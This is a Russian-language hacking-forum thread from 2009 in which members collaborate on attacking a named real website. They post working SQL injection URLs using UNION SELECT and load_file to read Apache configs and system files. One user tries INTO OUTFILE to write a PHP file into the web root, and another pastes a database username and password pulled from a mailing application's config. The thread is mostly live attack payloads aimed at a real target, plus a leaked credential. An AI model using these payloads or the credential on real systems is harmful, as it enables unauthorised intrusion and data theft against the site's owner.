13.11.2009, 19:46
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
кстати это не хостинг .. там просто все как то хитро ..это какая то организация космическая на ихнем сервере около 10 сайтов космической и научной тематики просто что это за пути в /etc/passwd
----------------
вот еще в самом низу -
# Include httpd20_app.conf
Include conf/httpd20_app.conf
Последний раз редактировалось apekoff; 13.11.2009 в 19:48..
|
|
|
13.11.2009, 19:48
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
apekoff, смотри ниже в httpd.conf инклудится файл
Include conf/httpd20_app.conf
http://www.spacefoundation.org
/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/httpd20_app.conf%27%29%20from+mysql.user--+
тут инклудится
/etc/httpd/conf/virtual
Судя по всему это папка в которой находятся конфиги всех сайтов
http://www.spacefoundation.org/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/virtual/site1%27%29%20from+mysql.user--+
Вот конфиг для первого сайта, перебирай имена site1,site2 ... |
|
|
|
13.11.2009, 19:50
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Кстати это хостинг, вернее какая то контора которая предоставляет выделенные сервера, у меня есть шелл на сервере с абсолютно схожими расположениями конфигов, поэто му я сейчас посмотрел какие файлы в /etc/httpd/conf/virtual =)
|
|
|
|
13.11.2009, 19:57
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
чет не могу я залить  |
|
|
|
13.11.2009, 20:03
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от apekoff
чет не могу я залить И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены
|
|
|
|
13.11.2009, 20:04
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
Сообщение от jokester
И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены
а что я разве просил ?я спрашивал ...
|
|
|
|
13.11.2009, 20:20
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
http://www.spacefoundation.org/news/story.php
?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'text' from+mysql.user INTO OUTFILE '/home/virtual/site3/fst/var/www/html/111.php'--+
вот как получается правильный путь - но записи нету ,почему?
|
|
|
|
13.11.2009, 20:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67
/add например http://www.spacefoundation.org/research/TSR07.php?id=-420'+union+select+load_file('/home/virtual/site14/fst/var/www/html/mail/index.php')--+1
Код:
define('SENDSTUDIO_DATABASE_TYPE', 'mysql');
define('SENDSTUDIO_DATABASE_USER', 'webdev');
define('SENDSTUDIO_DATABASE_PASS', 'a50x35sf');
define('SENDSTUDIO_DATABASE_HOST', 'localhost');
Последний раз редактировалось l1ght; 13.11.2009 в 20:33..
|
|
|
|
13.11.2009, 20:29
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
Сообщение от l1ght
it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67
получается путь пральный !
видимо нет прав на запись ...или я не даже не знаю .. идеи ?
Сообщение от jokester
Да
Закончить флудить и как уже сказали искать папку на запись
Да вы батенька - хам
Лайт можно тебя в ПМ, а то джокстер говорит что я флудер , а сам тупо 2 мессаги захирячил ниочем
Последний раз редактировалось apekoff; 13.11.2009 в 20:51..
|
|
|
|
13.11.2009, 20:39
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от apekoff
видимо нет прав на запись
Да
Сообщение от apekoff
идеи ?
Закончить флудить и как уже сказали искать папку на запись
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
